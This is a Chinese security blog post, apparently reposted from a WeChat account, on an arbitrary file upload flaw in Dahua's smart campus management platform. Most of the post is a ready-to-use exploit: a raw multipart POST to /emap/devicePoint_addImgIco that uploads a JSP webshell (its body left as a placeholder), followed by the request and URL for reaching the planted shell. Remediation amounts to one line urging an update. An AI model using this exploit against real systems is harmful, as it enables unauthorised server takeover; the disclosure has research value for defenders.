大华任意文件上传漏洞（附EXP）

admin

145979
文章

119
评论

2024年9月28日13:11:33评论102 views字数 1034阅读3分26秒阅读模式

大华任意文件上传漏洞（附EXP）

0x01 前言

大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。该平台开放了文件上传功能，但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤，攻击者可以利用该漏洞可以控制服务器权限。

0x02 影响平台

大华智慧园区综合管理平台

0x03 漏洞复现

页面是这个酱紫

大华任意文件上传漏洞（附EXP）

EXP：

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Host: 192.168.2.11:81User-Agent: python-requests/2.26.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-AliveContent-Length: 224Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982Content-Disposition: form-data; name="upload"; filename="a.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary马子内容--f3aeb22be281d77542546a2f71e20982--

上传成功会返回文件名ico_xxx_***.jsp

大华任意文件上传漏洞（附EXP）

Success~

GET /upload/emap/society_new/ico_res_845ebece1736_on.jsp HTTP/1.1Host: 192.168.2.11:81User-Agent: python-requests/2.26.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-Alive

大华任意文件上传漏洞（附EXP）

shell地址：

http://192.168.2.11:81/upload/emap/society_new/ico_res_845ebece1736_on.jsp

0x04 参考来源

https://mp.weixin.qq.com/s/jk9zWDU5EEGVMpAQ6d0ocw

0x05 修复方案

建议及时更新至最新版本！

大华任意文件上传漏洞（附EXP）

原文始发于微信公众号（EchoSec）：0day | 某华任意文件上传漏洞（附EXP）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

大华任意文件上传漏洞（附EXP）

【提权】CVE-2025-32463 超低难度Linux提权漏洞，速度修复

绿盟网络入侵防护系统users.json敏感信息泄露漏洞

IBM WebSphere 远程代码执行漏洞(CVE-2025-36038)

Optilink upgrade.php 命令执行漏洞

【安全风险通告】Linux本地提权漏洞利用链 (CVE-2025-6018、CVE-2025-6019)

Apache JSPWiki跨站请求伪造漏洞（CVE-2022-24947）

PostgreSQL JDBC Driver RCE

Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164 )检测与防御nCVE-2021-28164

CVE-2025-32462&CVE-2025-32463

【成功复现】WinRAR目录遍历漏洞(CVE-2025-6218)

发表评论

在线咨询

微信